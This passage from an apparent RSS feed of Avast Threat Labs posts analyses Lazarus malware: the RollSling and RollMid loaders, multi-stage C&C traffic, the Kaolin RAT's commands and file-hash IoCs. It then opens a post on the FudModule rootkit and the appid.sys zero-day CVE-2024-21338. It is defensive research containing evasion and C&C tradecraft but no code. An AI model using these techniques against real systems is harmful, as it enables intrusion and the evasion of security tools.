<li>%driveLetter%:\\ProgramData\\Package Cache\\ [0-9A-Z]{8}-09C7-886E-II7F-[0-9A-Z]{12}\\ </li>
</ul>
<p>These folders serve as destinations for moving the binary blob, now renamed with a newly generated name and a <code>".cab"</code> extension. <code>RollSling</code> loader will store the binary blob in the first created folder, and it will store a new temporary file, whose usage will be mentioned later, in the second created folder.  </p>
<p>The attacker utilizes the <code>"Package Cache"</code> folder, a common repository for software installation files, to better hide its malicious files in a folder full of legitimate files. In this approach, the attacker also leverages the <code>".cab"</code> extension, which is the usual extension for the files located in the <code>Package Cache</code> folder. By employing this method, the attacker is trying to effectively avoid detection by relocating essential files to a trusted folder. </p>
<p>In the end, the <code>RollSling</code> loader calls an exported function called <code>"StartAction"</code>. This function is called with specific arguments, including information about the actual path of the <code>RollFling</code> loader, the path where the binary blob resides, and the path of a temporary file to be created by the <code>RollMid</code> loader. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="477" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3-1024x477.png" alt="" class="wp-image-8352" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3-1024x477.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3-300x140.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3-768x358.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3-1536x715.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3.png 1733w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 2: Looking for a binary blob in the same folder as the <code>RollFling</code> loader</figcaption></figure></div>
<h3 class="wp-block-heading">RollMid</h3>
<p>The responsibility of the <code>RollMid</code> loader lies in loading key components of the attack and configuration data from the binary blob, while also establishing communication with a C&C server. </p>
<p>The binary blob, containing essential components and configuration data, serves as a critical element in the proper execution of the attack chain. Unfortunately, our attempts to obtain this binary blob were unsuccessful, leading to gaps in our full understanding of the attack. However, we were able to retrieve the <code>RollMid</code> loader and certain binaries stored in memory. </p>
<p>Within the binary blob, the <code>RollMid</code> loader is a fundamental component located at the beginning (see Figure 3). The first 4 bytes in the binary blob describe the size of the <code>RollMid</code> loader. There are two more binaries stored in the binary blob after the <code>RollMid</code> loader as well as configuration data, which is located at the very end of the binary blob. These two other binaries and configuration data are additionally subject to compression and AES encryption, adding layers of security to the stored information.  </p>
<p>As depicted, the first four bytes enclosed in the initial yellow box describe the size of the <code>RollMid </code>loader. This specific information is also important for parsing, enabling the transition to the subsequent section within the binary blob. </p>
<p>Located after the <code>RollMid</code> loader, there are two 4-byte values, distinguished by yellow and green colors. The former corresponds to the size of <code>FIRST_ENCRYPTED_DLL</code> section, while the latter (green box) signifies the size of <code>SECOND_ENCRYPTED_DLL</code> section. Notably, the second 4-byte value in the green box serves a dual purpose, not only describing a size but also at the same time constituting a part of the 16-byte AES key for decrypting the <code>FIRST_ENCRYPTED_DLL</code> section. Thanks to the provided information on the sizes of each encrypted DLL embedded in the binary blob, we are now equipped to access the configuration data section placed at the end of the binary blob. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="483" height="422" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/BinaryBlob.drawio.png" alt="" class="wp-image-8356" style="width:483px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/BinaryBlob.drawio.png 483w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/BinaryBlob.drawio-300x262.png 300w" sizes="(max-width: 483px) 100vw, 483px" /><figcaption class="wp-element-caption">Figure 3: Structure of the Binary blob </figcaption></figure></div>
<p>The <code>RollMid</code> loader requires the <code>FIRST_DLL_BINARY </code>for proper communication with the C&C server. However, before loading <code>FIRST_DLL_BINARY</code>, the <code>RollMid</code> loader must first decrypt the <code>FIRST_ENCRYPTED_DLL</code> section. </p>
<p>The decryption process applies the AES algorithm, beginning with the parsing of the decryption key alongside an initialization vector to use for AES decryption. Subsequently, a decompression algorithm is applied to further extract the decrypted content. Following this, the decrypted <code>FIRST_DLL_BINARY</code> is loaded into memory, and the <code>DllMain</code> function is invoked to initialize the networking library. </p>
<p>Unfortunately, as we were unable to obtain the binary blob, we didn’t get a chance to reverse engineer the <code>FIRST_DLL_BINARY</code>. This presents a limitation in our understanding, as the precise implementation details for the imported functions in the <code>RollMid</code> loader remain unknown. These imported functions include the following: </p>
<ul>
<li><code>SendDataFromUrl </code></li>
<li><code>GetImageFromUrl</code> </li>
<li><code>GetHtmlFromUrl </code></li>
<li><code>curl_global_cleanup </code></li>
<li><code>curl_global_init </code></li>
</ul>
<p>After reviewing the exported functions by their names, it becomes apparent that these functions are likely tasked with facilitating communication with the C&C server. <code>FIRST_DLL_BINARY</code> also exports other functions beyond these five, some of which will be mentioned later in this blog.  </p>
<p>The names of these five imported functions imply that <code>FIRST_DLL_BINARY</code> is built upon the <a href="https://curl.se/libcurl/">curl library</a> (as can be seen by the names <code>curl_global_cleanup</code> and <code>curl_global_init</code>). In order to establish communication with the C&C servers, the <code>RollMid</code> loader employs the imported functions, utilizing HTTP requests as its preferred method of communication. </p>
<p>The rationale behind opting for the curl library for sending HTTP requests may stem from various factors. One notable reason could be the efficiency gained by the attacker, who can save time and resources by leveraging the HTTP communication protocol. Additionally, the ease of use and seamless integration of the curl library into the code further support its selection. </p>
<p>Prior to initiating communication with the C&C server, the malware is required to generate a dictionary filled with random words, as illustrated in Figure 4 below. Given the extensive size of the dictionary (which contains approximately hundreds of elements), we have included only a partial screenshot for reference purposes. The subsequent sections of this blog will delve into a comprehensive exploration of the role and application of this dictionary in the overall functionality of malware. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="545" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/FillDictonary-1-545x1024.png" alt="" class="wp-image-8358" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/FillDictonary-1-545x1024.png 545w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/FillDictonary-1-160x300.png 160w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/FillDictonary-1.png 562w" sizes="(max-width: 545px) 100vw, 545px" /><figcaption class="wp-element-caption">Figure 4: Filling the main dictionary </figcaption></figure></div>
<p>To establish communication with the C&C server, as illustrated in Figure 5, the malware must obtain the initial C&C addresses from the <code>CONFIGURATION_DATA</code> section. Upon decrypting these addresses, the malware initiates communication with the first layer of the C&C server through the <code>GetHtmlFromUrl</code> function, presumably using an HTTP GET request. The server responds with an HTML file containing the address of the second C&C server layer. Subsequently, the malware engages in communication with the second layer, employing the imported <code>GetImageFromUrl</code> function. The function name implies this performs a GET request to retrieve an image. </p>
<p>In this scenario, the attackers employ steganography to conceal crucial data for use in the next execution phase. Regrettably, we were unable to ascertain the nature of the important data concealed within the image received from the second layer of the C&C server. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="521" height="374" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/CC_communication.drawio.png" alt="" class="wp-image-8359" style="width:649px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/CC_communication.drawio.png 521w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/CC_communication.drawio-300x215.png 300w" sizes="(max-width: 521px) 100vw, 521px" /><figcaption class="wp-element-caption"><em>Figure <em>5</em>: Communication with C&C servers </em></figcaption></figure></div>
<p>We are aware that the concealed data within the image serves as a parameter for a function responsible for transmitting data to the third C&C server. Through our analysis, we have determined that the acquired data from the image corresponds to another address of the third C&C server.  Communication with the third C&C server is initiated with a POST request.  </p>
<p>Malware authors strategically employ multiple C&C servers as part of their operational tactics to achieve specific objectives. In this case, the primary goal is to obtain an additional data blob from the third C&C server, as depicted in Figure 5, specifically in step 7. Furthermore, the use of different C&C servers and diverse communication pathways adds an additional layer of complexity for security tools attempting to monitor such activities. This complexity makes tracking and identifying malicious activities more challenging, as compared to scenarios where a single C&C server is employed.</p>
<p>The malware then constructs a URL, by creating the query string with GET parameters (name/value pairs). The parameter name consists of a randomly selected word from the previously created dictionary and the value is generated as a random string of two characters. The format is as follows: </p>
<p><code><em>"%addressOfThirdC&C%?%RandomWordFromDictonary%=%RandomString%"</em> </code></p>
<p>The URL generation involves the selection of words from a generated dictionary, as opposed to entirely random strings. This intended choice aims to enhance the appearance and legitimacy of the URL. The words, carefully curated from the dictionary, contribute to the appearance of a clean and organized URL, resembling those commonly associated with authentic applications. The terms such as <code>"atype"</code>, <code>"User"</code>,” or <code>"type"</code> are not arbitrary but rather thoughtfully chosen words from the created dictionary. By utilizing real words, the intention is to create a semblance of authenticity, making the HTTP <code>POST </code>payload appear more structured and in line with typical application interactions.  </p>
<p>Before dispatching the <code>POST</code> request to the third layer of the C&C server, the request is populated with additional key-value tuples separated by standard delimiters “?” and “=” between the key and value. In this scenario, it includes: </p>
<p><code>%<em>RandomWordFromDictonary</em> %=%sleep_state_in_minutes%?%size_of_configuration_data%  </code></p>
<p>The data received from the third C&C server is parsed. The parsed data may contain an integer, describing sleep interval, or a data blob. This data blob is encoded using the base64 algorithm. After decoding the data blob, where the first 4 bytes indicate the size of the first part of the data blob, the remainder represents the second part of the data blob. </p>
<p>The first part of the data blob is appended to the <code>SECOND_ENCRYPTED_DLL</code> as an overlay, obtained from the binary blob. After successfully decrypting and decompressing <code>SECOND_ENCRYPTED_DLL</code>, the process involves preparing the <code>SECOND_ENCRYPTED_DLL</code>, which is a Remote Access Trojan (RAT) component to be loaded into memory and executed with the specific parameters. </p>
<p>The underlying motivation behind this maneuver remains shrouded in uncertainty. It appears that the attacker, by choosing this method, sought to inject a degree of sophistication or complexity into the process. However, from our perspective, this approach seems to border on overkill. We believe that a simpler method could have sufficed for passing the data blob to the <code>Kaolin</code> RAT.  </p>
<p>The second part of the data blob, once decrypted and decompressed, is handed over to the <code>Kaolin</code> RAT component, while the <code>Kaolin</code> RAT is executed in memory. Notably, the decryption key and initialization vector for decrypting the second part of the data blob reside within its initial 32 bytes.  </p>
<h2 class="wp-block-heading">Kaolin RAT</h2>
<p>A pivotal phase in orchestrating the attack involves the utilization of a Remote Access Trojan (RAT). As mentioned earlier, this <code>Kaolin</code> RAT is executed in memory and configured with specific parameters for proper functionality. It stands as a fully equipped tool, including file compression capabilities.  </p>
<p>However, in our investigation, the <code>Kaolin</code> RAT does not mark the conclusion of the attack. In the previous blog post, we already introduced another significant component – the <a href="https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/" target="_blank" rel="noreferrer noopener">FudModule</a> rootkit. Thanks to our robust telemetry, we can confidently assert that this rootkit was loaded by the aforementioned <code>Kaolin</code> RAT, showcasing its capabilities to seamlessly integrate and deploy <code>FudModule</code>. This layered progression underscores the complexity and sophistication of the overall attack strategy. </p>
<p>One of the important steps is establishing secure communication with the RAT’s C&C server, encrypted using the AES encryption algorithm. Despite the unavailability of the binary containing the communication functionalities (the RAT also relies on functions imported from <code>FIRST_DLL_BINARY</code> for networking), our understanding is informed by other components in the attack chain, allowing us to make certain assumptions about the communication method. </p>
<p>The <code>Kaolin</code> RAT is loaded with six arguments, among which a key one is the base address of the network module DLL binary, previously also used in the <code>RollMid</code> loader. Another argument includes the configuration data from the second part of the received data blob. </p>
<p>For proper execution, the <code>Kaolin</code> RAT needs to parse this configuration data, which includes parameters such as: </p>
<ul>
<li>Duration of the sleep interval. </li>
<li>A flag indicating whether to collect information about available disk drives. </li>
<li>A flag indicating whether to retrieve a list of active sessions on the remote desktop. </li>
<li>Addresses of additional C&C servers. </li>
</ul>
<p>In addition, the <code>Kaolin</code> RAT must load specific functions from <code>FIRST_DLL_BINARY</code>, namely: </p>
<ul>
<li><code>SendDataFromURL </code></li>
<li><code>ZipFolder </code></li>
<li><code>UnzipStr</code> </li>
<li><code>curl_global_cleanup</code> </li>
<li><code>curl_global_init</code> </li>
</ul>
<p>Although the exact method by which the <code>Kaolin</code> RAT sends gathered information to the C&C server is not precisely known, the presence of exported functions like <code>"curl_global_cleanup"</code> and <code>"curl_global_init"</code> suggests that the sending process involves again API calls from the curl library. </p>
<p>For establishing communication, the <code>Kaolin</code> RAT begins by sending a <code>POST</code> request to the C&C server. In this first <code>POST</code> request, the malware constructs a URL containing the address of the C&C server. This URL generation algorithm is very similar to the one used in the <code>RollMid</code> loader. To the C&C address, the <code>Kaolin</code> RAT appends a randomly chosen word from the previously created dictionary (the same one as in the <code>RollMid</code> loader) along with a randomly generated string. The format of the URL is as follows: </p>
<p><code><em>"%addressOfC&Cserver%?%RandomWordFromDictonary%=%RandomString%"</em> </code></p>
<p>The malware further populates the content of the <code>POST</code> request, utilizing the default <code>"application/x-www-form-urlencoded"</code> content type. The content of the <code>POST</code> request is subject to AES encryption and subsequently encoded with base64. </p>
<p>Within the encrypted content, which is appended to the key-value tuples (see the form below), the following data is included <code>(<em>EncryptedContent)</em></code>: </p>
<ul>
<li>Installation path of the <code>RollFling</code> loader and path to the binary blob </li>
<li>Data from the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Iconservice </li>
<li><code>Kaolin</code> RAT process ID </li>
<li>Product name and build number of the operating system. </li>
<li>Addresses of C&C servers. </li>
<li>Computer name </li>
<li>Current directory </li>
</ul>
<p>In the <code>POST</code> request with the encrypted content, the malware appends information about the generated key and initialization vector necessary for decrypting data on the backend. This is achieved by creating key-value tuples, separated by “&” and “=” between the key and value. In this case, it takes the following form: </p>
<p><code><em>%RandomWordFromDictonary%=%TEMP_DATA%&%RandomWordFromDictonary%=%IV%%KEY%&%RandomWordFromDictonary%=%EncryptedContent%&%RandomWordFromDictonary%=%EncryptedHostNameAndIPAddr%</em> </code></p>
<p>Upon successfully establishing communication with the C&C server, the <code>Kaolin</code> RAT becomes prepared to receive commands. The received data is encrypted with the aforementioned generated key and initialization vector and requires decryption and parsing to execute a specific command within the RAT. </p>
<p>When the command is processed the <code>Kaolin</code> RAT relays back the results to the C&C server, encrypted with the same AES key and IV. This encrypted message may include an error message, collected information, and the outcome of the executed function. </p>
<p>The <code>Kaolin</code> RAT has the capability to execute a variety of commands, including: </p>
<ul>
<li>Updating the duration of the sleep interval. </li>
<li>Listing files in a folder and gathering information about available disks. </li>
<li>Updating, modifying, or deleting files. </li>
<li>Changing a file’s last write timestamp. </li>
<li>Listing currently active processes and their associated modules. </li>
<li>Creating or terminating processes. </li>
<li>Executing commands using the command line. </li>
<li>Updating or retrieving the internal configuration. </li>
<li>Uploading a file to the C&C server. </li>
<li>Connecting to the arbitrary host. </li>
<li>Compressing files. </li>
<li>Downloading a DLL file from C&C server and loading it in memory, potentially executing one of the following exported functions: 
<ul>
<li><code>_DoMyFunc </code></li>
<li><code>_DoMyFunc2 </code></li>
<li><code>_DoMyThread (executes a thread)</code> </li>
<li><code>_DoMyCommandWork</code> </li>
</ul>
</li>
<li>Setting the current directory.</li>
</ul>
<h2 class="wp-block-heading">Conclusion</h2>
<p>Our investigation has revealed that the Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products. Thanks to our robust telemetry, we were able to uncover almost the entire attack chain, thoroughly analyzing each stage. The Lazarus group’s level of technical sophistication was surprising and their approach to engaging with victims was equally troubling. It is evident that they invested significant resources in developing such a complex attack chain. What is certain is that Lazarus had to innovate continuously and allocate enormous resources to research various aspects of Windows mitigations and security products. Their ability to adapt and evolve poses a significant challenge to cybersecurity efforts. </p>
<h2 class="wp-block-heading">Indicators of Compromise (IoCs) </h2>
<p>ISO<br>b8a4c1792ce2ec15611932437a4a1a7e43b7c3783870afebf6eae043bcfade30 </p>
<p>RollFling<br>a3fe80540363ee2f1216ec3d01209d7c517f6e749004c91901494fb94852332b </p>
<p>NLS files<br>01ca7070bbe4bfa6254886f8599d6ce9537bafcbab6663f1f41bfc43f2ee370e<br>7248d66dea78a73b9b80b528d7e9f53bae7a77bad974ededeeb16c33b14b9c56 </p>
<p>RollSling<br>e68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f<br>f47f78b5eef672e8e1bd0f26fb4aa699dec113d6225e2fcbd57129d6dada7def </p>
<p>RollMid<br>9a4bc647c09775ed633c134643d18a0be8f37c21afa3c0f8adf41e038695643e </p>
<p>Kaolin RAT<br>a75399f9492a8d2683d4406fa3e1320e84010b3affdff0b8f2444ac33ce3e690 </p>
<p>The post <a href="https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/">From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></content:encoded>
</item>
<item>
<title>Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day</title>
<link>https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day</link>
<dc:creator><![CDATA[Jan Vojtěšek]]></dc:creator>
<pubDate>Wed, 28 Feb 2024 13:14:50 +0000</pubDate>
<category><![CDATA[PC]]></category>
<category><![CDATA[BYOVD]]></category>
<category><![CDATA[CVE-2024-21338]]></category>
<category><![CDATA[exploit]]></category>
<category><![CDATA[FudModule]]></category>
<category><![CDATA[kernel]]></category>
<category><![CDATA[Lazarus]]></category>
<category><![CDATA[rootkit]]></category>
<category><![CDATA[zero-day]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=8182</guid>
<description><![CDATA[<p>The Lazarus Group is back with an upgraded variant of their FudModule rootkit, this time enabled by a zero-day admin-to-kernel vulnerability for CVE-2024-21338. Read this blog for a detailed analysis of this rootkit variant and learn more about several new techniques, including a handle table entry manipulation technique that directly targets Microsoft Defender, CrowdStrike Falcon, and HitmanPro.</p>
<p>The post <a href="https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/">Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<h2 class="wp-block-heading">Key Points</h2>
<ul>
<li>Avast discovered an in-the-wild admin-to-kernel exploit for a previously unknown zero-day vulnerability in the appid.sys AppLocker driver. </li>
<li>Thanks to Avast’s prompt report, Microsoft addressed this vulnerability as <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338" target="_blank" rel="noreferrer noopener">CVE-2024-21338</a> in the February Patch Tuesday update. </li>
<li>The exploitation activity was orchestrated by the notorious Lazarus Group, with the end goal of establishing a kernel read/write primitive. </li>
<li>This primitive enabled Lazarus to perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit, a previous version of which was analyzed by <a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" target="_blank" rel="noreferrer noopener">ESET</a> and <a href="https://download.ahnlab.com/global/brochure/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD.pdf" target="_blank" rel="noreferrer noopener">AhnLab</a>. </li>
<li>After completely reverse engineering this updated rootkit variant, Avast identified substantial advancements in terms of both functionality and stealth, with four new – and three updated – rootkit techniques. </li>
<li>In a key advancement, the rootkit now employs a new handle table entry manipulation technique in an attempt to suspend PPL (Protected Process Light) protected processes associated with Microsoft Defender, CrowdStrike Falcon, and HitmanPro. </li>
<li>Another significant step up is exploiting the zero-day vulnerability, where Lazarus previously utilized much noisier BYOVD (Bring Your Own Vulnerable Driver) techniques to cross the admin-to-kernel boundary. </li>
<li>Avast’s investigation also recovered large parts of the infection chain leading up to the deployment of the rootkit, resulting in the discovery of a new RAT (Remote Access Trojan) attributed to Lazarus. </li>
<li>Technical details concerning the RAT and the initial infection vector will be published in a follow-up blog post, scheduled for release along with our <a href="https://www.blackhat.com/asia-24/briefings/schedule/#from-byovd-to-a--day-unveiling-advanced-exploits-in-cyber-recruiting-scams-37786" target="_blank" rel="noreferrer noopener">Black Hat Asia 2024 briefing</a>. </li>
</ul>
<h2 class="wp-block-heading">Introduction </h2>
<p>When it comes to Windows security, there is a thin line between admin and kernel. Microsoft’s <a href="https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria" target="_blank" rel="noreferrer noopener">security servicing criteria</a> have long asserted that “[a]dministrator-to-kernel is not a security boundary”, meaning that Microsoft reserves the right to patch admin-to-kernel vulnerabilities at its own discretion. As a result, the Windows security model does not guarantee that it will prevent an admin-level attacker from directly accessing the kernel. This isn’t just a theoretical concern. In practice, attackers with admin privileges <a href="https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/#:~:text=Known%20usage%20in%20the%20wild" target="_blank" rel="noreferrer noopener">frequently</a> achieve kernel-level access by exploiting known vulnerable drivers, in a technique called <a href="https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/" target="_blank" rel="noreferrer noopener">BYOVD</a> (Bring Your Own Vulnerable Driver). </p>
<p>Microsoft hasn’t given up on securing the admin-to-kernel boundary though. Quite the opposite, it has made a great deal of progress in making this boundary harder to cross. Defense-in-depth protections, such as <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/driver-signing" target="_blank" rel="noreferrer noopener">DSE</a> (Driver Signature Enforcement) or <a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-hvci-enablement" target="_blank" rel="noreferrer noopener">HVCI</a> (Hypervisor-Protected Code Integrity), have made it increasingly difficult for attackers to execute custom code in the kernel, forcing most to resort to data-only attacks (where they achieve their malicious objectives solely by reading and writing kernel memory). Other defenses, such as <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/microsoft-recommended-driver-block-rules" target="_blank" rel="noreferrer noopener">driver blocklisting,</a> are pushing attackers to move to exploiting less-known vulnerable drivers, resulting in an increase in attack complexity. Although these defenses haven’t yet reached the point where we can officially call admin-to-kernel a security boundary (BYOVD attacks are still feasible, so calling it one would just mislead users into a false sense of security), they clearly represent steps in the right direction. </p>
<p>From the attacker’s perspective, crossing from admin to kernel opens a whole new realm of <a href="https://github.com/wavestone-cdt/EDRSandblast" target="_blank" rel="noreferrer noopener">possibilities</a>. With kernel-level access, an attacker might disrupt security software, conceal indicators of infection (including files, network activity, processes, etc.), disable kernel-mode telemetry, turn off mitigations, and more. Additionally, as the security of <a href="https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-" target="_blank" rel="noreferrer noopener">PPL</a> (Protected Process Light) relies on the admin-to-kernel boundary, our hypothetical attacker also gains the ability to tamper with protected processes or add protection to an arbitrary process. This can be especially powerful if lsass is <a href="https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection" target="_blank" rel="noreferrer noopener">protected with RunAsPPL</a> as bypassing PPL could enable the attacker to dump otherwise unreachable credentials.  </p>
<p>For more specific examples of what an attacker might want to achieve with kernel-level access, keep reading this blog – in the <a href="#techniques">latter half</a>, we will dive into all the techniques implemented in the FudModule rootkit. </p>
<h5 class="wp-block-heading">Living Off the Land: Vulnerable Drivers Edition </h5>
<p>With a seemingly growing number of attackers seeking to abuse some of the previously mentioned kernel capabilities, defenders have no choice but to hunt heavily for driver exploits. Consequently, attackers wishing to target well-defended networks must also step up their game if they wish to avoid detection. We can broadly break down admin-to-kernel driver exploits into three categories, each representing a trade-off between attack difficulty and stealth. </p>
<h6 class="wp-block-heading"><strong>N-Day BYOVD Exploits</strong> </h6>
<p>In the simplest case, an attacker can leverage BYOVD to exploit a publicly known n-day vulnerability. This is very easy to pull off, as there are plenty of public proof-of-concept exploits for various vulnerabilities. However, it’s also relatively straightforward to detect since the attacker must first drop a known vulnerable driver to the file system and then load it into the kernel, resulting in two great detection opportunities. What’s more, some systems may have Microsoft’s <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/microsoft-recommended-driver-block-rules#microsoft-vulnerable-driver-blocklist" target="_blank" rel="noreferrer noopener">vulnerable driver blocklist</a> enabled, which would block some of the most common vulnerable drivers from loading. <a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" target="_blank" rel="noreferrer noopener">Previous</a> <a href="https://download.ahnlab.com/global/brochure/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD.pdf" target="_blank" rel="noreferrer noopener">versions</a> of the FudModule rootkit could be placed in this category, initially exploiting a known vulnerability in <a href="https://www.virustotal.com/gui/file/0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5/detection" target="_blank" rel="noreferrer noopener">dbutil_2_3.sys</a> and then moving on to targeting <a href="https://www.virustotal.com/gui/file/175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347" target="_blank" rel="noreferrer noopener">ene.sys</a> in later versions. </p>
<h6 class="wp-block-heading"><strong>Zero-Day BYOVD Exploits</strong> </h6>
<p>In more sophisticated scenarios, an attacker would use BYOVD to exploit a zero-day vulnerability within a signed third-party driver. Naturally, this requires the attacker to first discover such a zero-day vulnerability, which might initially seem like a daunting task. However, note that any exploitable vulnerability in any signed driver will do, and there is unfortunately no shortage of low-quality third-party drivers. Therefore, the difficulty level of discovering such a vulnerability might not be as high as it would initially seem. It might suffice to scan a collection of drivers for known vulnerability patterns, as demonstrated by Carbon Black researchers who recently used bulk static analysis to <a href="https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html" target="_blank" rel="noreferrer noopener">uncover</a> 34 unique vulnerabilities across more than 200 signed drivers. Such zero-day BYOVD attacks are notably stealthier than n-day attacks since defenders can no longer rely on hashes of known vulnerable drivers for detection. However, some detection opportunities still remain, as loading a random driver represents a suspicious event that might warrant deeper investigation. For an example of an attack belonging to this category, consider the spyware vendor Candiru, which we <a href="https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/" target="_blank" rel="noreferrer noopener">caught</a> exploiting a zero-day vulnerability in <a href="https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5" target="_blank" rel="noreferrer noopener">hw.sys</a> for the final privilege escalation stage of their browser exploit chain. </p>
<h6 class="wp-block-heading"><strong>Beyond BYOVD</strong> </h6>
<p>Finally, the holy grail of admin-to-kernel is going beyond BYOVD by exploiting a zero-day in a driver that’s known to be already installed on the target machine. To make the attack as universal as possible, the most obvious target here would be a built-in Windows driver that’s already a part of the operating system.  </p>
<p>Discovering an exploitable vulnerability in such a driver is significantly more challenging than in the previous BYOVD scenarios for two reasons. First, the number of possible target drivers is vastly smaller, resulting in a much-reduced attack surface. Second, the code quality of built-in drivers is arguably higher than that of random third-party drivers, making vulnerabilities much more difficult to find. It’s also worth noting that – while patching tends to be ineffective at stopping BYOVD attacks (even if a vendor patches their driver, the attacker can still abuse the older, unpatched version of the driver) – patching a built-in driver will make the vulnerability no longer usable for this kind of zero-day attacks. </p>
<p>If an attacker, despite all of these hurdles, manages to exploit a zero-day vulnerability in a built-in driver, they will be rewarded with a level of stealth that cannot be matched by standard BYOVD exploitation. By exploiting such a vulnerability, the attacker is in a sense <a href="https://www.crowdstrike.com/cybersecurity-101/living-off-the-land-attacks-lotl/" target="_blank" rel="noreferrer noopener">living off the land</a> with no need to bring, drop, or load any custom drivers, making it possible for a kernel attack to be truly fileless. This not only evades most detection mechanisms but also enables the attack on systems where driver allowlisting is in place (which might seem a bit ironic, given that CVE-2024-21338 concerns an AppLocker driver).  </p>
<p>While we can only speculate on Lazarus’ motivation for choosing this third approach for crossing the admin-to-kernel boundary, we believe that stealth was their primary motivation. Given their level of notoriety, they would have to swap vulnerabilities any time someone burned their currently used BYOVD technique. Perhaps they also reasoned that, by going beyond BYOVD, they could minimize the need for swapping by staying undetected for longer. </p>
<h2 class="wp-block-heading">CVE-2024-21338 </h2>
<p>As far as zero-days go, CVE-2024-21338 is relatively straightforward to both understand and exploit. The vulnerability resides within the IOCTL (Input and Output Control) dispatcher in <code>appid.sys</code>, which is the central driver behind <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/applocker-overview" target="_blank" rel="noreferrer noopener">AppLocker</a>, the application whitelisting <a href="https://www.tiraniddo.dev/2019/11/the-internals-of-applocker-part-1.html" target="_blank" rel="noreferrer noopener">technology</a> built into Windows. The vulnerable control code <code>0x22A018</code> is designed to compute a <em>smart hash</em> of an executable image file. This IOCTL offers some flexibility by allowing the caller to specify how the driver should query and read the hashed file. The problem is, this flexibility is achieved by expecting two kernel function pointers referenced from the IOCTL’s input buffer: one containing a callback pointer to query the hashed file’s size and the other a callback pointer to read the data to be hashed.  </p>
